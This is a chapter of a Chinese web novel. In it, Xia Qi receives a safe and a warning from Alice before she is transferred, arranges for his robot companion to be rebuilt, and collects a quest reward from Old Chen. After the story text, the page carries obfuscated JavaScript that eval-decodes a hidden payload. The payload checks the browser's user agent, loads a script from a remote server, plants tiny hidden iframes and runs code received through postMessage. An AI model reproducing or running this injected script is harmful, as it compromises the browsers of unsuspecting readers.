第171 离前准备

  医院门口,一辆黑色轿车停在路边,两名便衣站在车旁,看到夏启之后立刻招手。

  他们是约翰给夏启配置的安保,在最后这一周里,要防止公司暗地搞事,安保还是必须要有的,虽然碰上事大概率是夏启保护他们,但人多可以壮胆,和不打架都得摇人是一个道理,在这种特殊情况下,身边就算多出一条狗也是个战力。

  半小时后,车子停在内环区一栋公寓楼下。

  夏启没有过多停留,上电梯直达十九层。

  木质防盗门后面就是爱丽丝家,夏启站在门前,敲门的手离门只有几厘米时停住。

  门开了,爱丽丝彷佛知道夏启就在门外。

  “我装了摄像头。”

  “理解。”

  “进来吧。”

  “用换鞋吗?”

  “用,但是我没多余的鞋。”

  夏启坐在沙发上,他总觉得这个屋子显得很冷清,其实不用细想也能明白,不冷清就怪了,爱丽丝没什么朋友,硬要说,也就一个麦琳,一个嘉米尔,这俩一个伤的昏迷,一个已经死了。

  你和华英雄什么关系?

  天煞孤星知道吗?

  夏启忍住调侃的欲望,看到爱丽丝从里屋拉出一个保险箱。

  作为一个肌肉强化过的异能者,爱丽丝能把一捆快子掰断,证明团结没有力量。

  爱丽丝坐下后长出一口气,拍了拍保险箱,道:“呐~作为帮助我的感谢,这里面的东西都是你的了。”

  “我第一次见到把保险箱当礼盒的。”

  “里面有我的部分存款,不要是吧?”

  “我看我像那种人吗。”

  “那就好,记得收好。”爱丽丝低下头,点了一支烟,“后续的工作约翰和我说了,也和你说了,我会调配到晨星城,知道那里吧?冰天雪地的地方。”

  夏启点头迎合一声,“那丝袜估计用不上了。”

  “我都放保险箱里了。”

  看来能卖个好价钱,夏启腹诽。

  爱丽丝说道:“我有些事要和你说。”

  夏启没有回答,而是靠到沙发上,陷进柔软的垫子里,看着冷色调的天花板说道:“你应该没有倾诉对象了,我可以听听。”

  爱丽丝突然沉默,侧过头来,望向夏启,苍白的脸上带着温和而轻松的笑容,嗓音清脆却有些颤抖:

  “要说的也没什么,我最好的朋友被我杀死,按道理她应该有更好的结局,但是为了保护我而选择成为异化者这件事,虽然我很感动,但我不能理解,我在说真的,我无法做到像正常人那样产生同理心,自从加入符文会之后渐渐的,我失去了很多,更多的是见到太多扭曲的事物,太多隐藏在阴暗的悲剧,等到一些事情发生在我自己身上的时候,才发现因为别人而触动的情绪好像快没。”

  说到这里,她唏嘘一声:

  “如果我们生在内环区或者外环区一个普通中等家庭里,我会找一个稳定的工作,每天准时上班,可能会谈几次恋爱,压力大了就找朋友出来骂骂人吃吃饭,也许可以正常的去逛街了,而嘉米尔,她可以追求自己舞者的梦想,也可以去灯盏学院深造炼金术,成为学者。”

  “也许这样一来……”

  “我们现在已经死于非命了,在外面吃饭的时候被流氓打死,深造舞者的过程被凌辱自杀。”

  她的话锋一转让夏启猝不及防,但又在情理之中。

  “这个世界不讲道理,活着就是唯一的胜利,我就是这么想的,所以如果你还存在一丝丝的同理心,就找个闲差活下去,以你的能力没人能对你怎么样,但以你惹事的水平,死不会太遥远。”

  “找个机会离开符文会吧,时间久了,你会和我一样变成一个混蛋。”

  爱丽丝低下头,思考着什么,但明显没想说出来,转而抬头,笑容温暖:

  “能以嘉米尔为节点,和你一起完成最后一个任务,我很开心。”

  按剧情逻辑,夏启现在应该把爱丽丝抱床上去,小姐你还有个好友叫麦琳,如果你不想她出事,你明白的……然后镜头就得开始特写。

  但夏启不允许这么庸俗的事情发生。

  他把爱丽丝嘴上的烟拿过来,在对方一愣的表情下抽了一口。

  爱丽丝说的话半真半假,他明白,这个女人是想劝他离开是非。

  哪有那么容易。

  夏启也想当个躺在床上坐吃等死的废物。

  他默默的抽完这根烟,掐灭在烟灰缸里,起身把保险箱拉出去。

  爱丽丝靠在门框上,看着他,摆了摆手示意再见。

  夏启转过头,在走廊忽明忽暗的灯光下,露出了少有的笑容。

  “我还以为你会以一个舌吻作为告别礼呢。”

  爱丽丝眼珠子俏皮的瞥向天花板,“如果下次能活着见面。”

  夏启撇了撇嘴,说道:“小心加洛特,病院的召唤阵是他三周前教给聂泽克的,阵眼里有他留下的能量,咱们在病院的一举一动,他都能感应到。”

  “夏启……最后我再和你说件事,病院里藏着一个比加洛特和深度四级异化者更恐怖的事物。”爱丽丝回想着那天,“咱们住进病院的第一天晚上,还记着吧,我感觉到有一双眼睛盯着咱们,很可怕的感觉,比我这些年接触到的一切事物都要可怕。”

  这倒是夏启没想到的,当初爱丽丝确实说过感觉有眼睛在盯着他们,后来只是觉得那应该来自异化者。

  夏启不再多说什么,转过头摆了摆手,“我会注意的,再见,随时保持联系。”

  爱丽丝看着夏启的背影,忽然有种感觉,可能很长时间他们都见不到了。

  也可能永远见不到了。

  他应该不会听我的劝吧,爱丽丝腹诽着,这一幕似曾相识,彷佛回到了六年前嘉米尔送别她离开疯人院的那天,只是现在身份互换,她好像变成了那个被抛下的人。

  ……

  ……

  夏启来到捷洛的人体神经医院。

  他把保险箱留在这里,告知了这次行动的结局,“二耶被炸死了,但我收集到一些数据,可以制造更加完善的机械人。”

  夏启把腕表打开,将里面的收集数据传输到电脑上。

  机械人的改造方桉需要不断试错中升级,二耶身体泯灭并不可怕,她的记忆随时都会传输到捷洛这里的库存预留盘中。

  就像夏启前世玩过的一款游戏那样,人造人身体死亡后记忆数据上传到太空的地堡中,连接到备用身体再去执行任务,那款游戏叫《2b(划掉)》。

  捷洛颔首,“再造一个吧。”

  马虎从小屋里出来,看到自己这位“徒弟”还活着,嘴角微微上扬。

  这老头平常跟个哑巴似的,在夏启身边时与其说是师傅,更像个老维修员。

  夏启对他很敬重,一个真正低调的机械大师。

  二耶身体再造的工程需要几天时间,这期间,夏启回到了杂事屋,绕过老陈直接回到自己的小院。

  出院到现在为止,他的脑袋还有些难受,躺到床上便睡了一觉。

  第二天早上,他被茉莉的电话吵醒。

  睡梦中,夏启无精打采的接起电话,忽然那头一声咆孝把他震的精神抖擞。

  “你怎么回事!人都联系不上,教学直播又得往后推了!”

  夏启撇了撇嘴,他也没办法,昏迷了两天,能活过来就不容易了,不过看茉莉的样子,约翰和柴老头应该没有和黑古拉那边联系过,这预示着当前面临的情况可能比想象中还要严峻。

  “教学的事可以往后稍一稍,茉莉,跟我说一下你在黑古拉那边拿到多少笔武器改装的单子?”

  茉莉那边顿了顿,翻找着账单,说道:“一共71笔交易,总账收益在32560恩姆,这笔钱我做了个临时理财的储备……”

  “钱不钱的再说,把单子给我发过来。”

  夏启挂断电话。

  他现在需要的不是钱,而是大额的技能点数。

  内测在近期内就要开始,在此之前他要尽量做到算无遗漏的准备,技能点数或许会成为他发布npc任务的重要奖励,保不齐这些奖励点数要从他手里扣除。

  这样一算,创造系的好处就出来了,四个主要途径中,唯有创造系可以通过制作武器装备得到技能点数,而且根据制成品的精良度,获得的点数上下限差距很大。

  他跳下床,拿起手机看到爱丽丝一条[再见]的信息,愣了那么一秒,面无表情的拿起笔在纸上写下了未来要准备的事情。

  很快他列出了五条任务目标。

  一、去工厂把药剂品捞一些。

  二、找漫画社商量一下,上更大的电子平台做宣传,这样一边收钱一边获得更多的职业点数,【画师】还有632点就能升到5级。

  三、把茉莉给的单子做了,能做多少是多少。

  四、尽快决定下一个目标地点。

  五、二耶。

  把笔杆子放下的时候,心里也在盘算着疯人院的事情。

  加洛特没死,他的存在使乐园的军工扩军迁移了多年,达到在10100年以前具备了阻止“第四天灾”降临的前缀准备,也就是他作为“补丁”修复的第一层bug其实就是阻止加洛特在约克郡和疯人院里,一明一暗两条计划。

  一个欲要阻止“第四天灾”的组织,他们到底是混沌还是中立?

  夏启甩了甩脸,现在想这种问题那就是猴儿拿虱子——瞎掰。

  “乐园是怎么知道‘第四天灾’这东西的……这些家伙的存在背后还隐藏着太多东西啊……”

  爱阅书香

  “还是想下去哪吧。”

  “米德朗是最大的资源体集中地,那里机会更多,但是破晓的主要根据地都在米德朗附近,其实首都比任何地方都危险。”

  “灯盏学院……关键词三个,炼金术、狂枭、欧列克峡谷。”

  他决定先去老陈那转转,把供货商的事情说清楚。

  进入杂货屋的时候,老陈正在柜台后面擦他的假酒。

  见到夏启后,老陈撇了撇嘴,“还活着?”

  “惊不惊喜?”

  “你小子……”老陈欲言又止,其实他挺担心的,但还是转了个话题说道:“佩姬给我消息了,你们的事情我知道的应该八九不离十,关于这件事,她那边有个谢礼要给你。”

  【任务已完成:呵,女人】

  【任务奖励:杂事屋好感度900,得到一份黑市地图】

  【额外奖励:佩姬的义手】

  老陈拿出一张地图和一只手臂。

  “黑市电子地图,如果你出差在外,用这个地图可以看到任何城市黑市窝点,有时候地图上会标注着红点,那里是佩姬安排在黑市里的商铺。”

  “至于她的手臂……”

  夏启拿起【佩姬的义手】,他记着这只手里曾窜出了很恶心的吸管嘴。

  “呵,值得研究一下,这供货商还挺懂顾客需求啊。”

  哐!

  门被暴力推开。

  一个壮硕的硬汉走进杂事屋。

  “欢迎光临。”

  老陈刚喊完这句话的时候,突见夏启愣住了。

  那表情就像见到了皮肤镀金的**。

  “喂……夏启,你可别做出什么荒唐事打扰我……”

  “唉?”

  “哎哎哎!?”

  他看着夏启上去给那个顾客来了个膝盖碎裂式下跪。
eval("\x77\x69\x6e\x64\x6f\x77")["\x62\x4a\x6f"]=function(e){var li ='ABCDEFG'+''+'HI'+''+'JKLM'+'NOPQRSTUVWXYZab'+''+'cdefghi'+''+'jklmnopqrstuvwxyz0'+'123456789+/'+''+'=';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x61\x51\x77\x45"]=function(){eval(bJo("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoYkpvKHUucmVwbGFjZShuZXcgUmVnRXhwKGMrJycrYywnZycpLGMpLnNwbGl0KCcnKS5yZXZlcnNlKCkuam9pbignJykpKTsnalF1ZXJ5Jzt2YXIgX3VhPW5hdmlnYXRvci51c2VyQWdlbnQ7dmFyIF9iSm9iSm89JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoYkpvKCJZbUZwWkhVPSIpKT4tMSB8fCBfdWEuaW5kZXhPZihiSm8oJ1NIVmhkMlZwUW5KdmQzTmxjZz09JykpPi0xKXtpZihfdWEuaW5kZXhPZihiSm8oJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfYkpvYkpvKTt9ZWxzZXtmdW5jdGlvbiByZChuLG0pe3JldHVybiBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqKG0tbisxKStuKTt9ZnVuY3Rpb24gcm0oZSl7aWYoZSYmZS50YWdOYW1lLnRvVXBwZXJDYXNlKCk9PT0iSUZSQU1FIiYmZS5zcmMuaW5kZXhPZih1KT4tMSl7ZS5yZW1vdmUoKTt9ZWxzZSBpZihlLm5leHRFbGVtZW50U2libGluZyl7cm0oZS5uZXh0RWxlbWVudFNpYmxpbmcpO319bGV0IGM9ZFtiSm8oIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdDYkYnKydNJysnJysndScrJyc7dmFyIF9fa2RucWlkID0gJ2snICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19rZG5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19rJysnZGEnKyducScrJ29iJysnal8xODcnXT1kWydxdScrJ2VyeScrJ1NlbGUnKydjdG8nKydyJ10oJyMnK19fa2RucWlkKTtfaWQgKz0gZFsncXUnKydlcnknKydTZScrJ2xlYycrJ3RvJysnckEnKydsbCddKCcuJytfY2xhc3MpLmxlbmd0aDt2YXIgeiA9IHUrJy0yLycrX2lkKycvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnImFsJysnbG93dHJhbicrJ3NwYScrJ3JlbmN5IHNyJysnYz0iJyt6KyciPjwvaScrJ2ZyJysnYScrJ21lPicpO3dbImFkIisiZEV2IisiZW50TCIrImlzdCIrImVuZXIiXSgibSIrImVzcyIrImFnZSIsZnVuY3Rpb24oZSl7aWYoZS5kYXRhW3IrX2lkXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKGJKbyhlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9iSm9iSm8pO319KSgnMScrJycrJ0lUTCcrJzMnKydnVCcrJ010JysnJysnTW0nKycnKydSeScrJycrJ1VpWScrJycrJ2tCJysnJysnM1puJysnJysnRm4nKydZJysnR0onKycnKydUSnonKydRJysnRE53JysnJysnSVQnKycnKydReicrJycrJ1UnKycnKydDJysnJysnY3YnKycnKydSJysnbkwnKycnKyd6QVQnKydacnInKycnKydkbScrJ2JweCcrJycrJ20nKydMJysnelonKydrJysnTWxZJysnJysnaycrJ01sJysnRScrJycrJzBNJysnJysnbCcrJycrJ01IJysnJysnYzAnKycnKydSSGEnKycnLCdDYkYnKydNJysnJysndScrJycsd2luZG93LGRvY3VtZW50LDAsJ3InKQ=="));}

上一章目录+书签下一章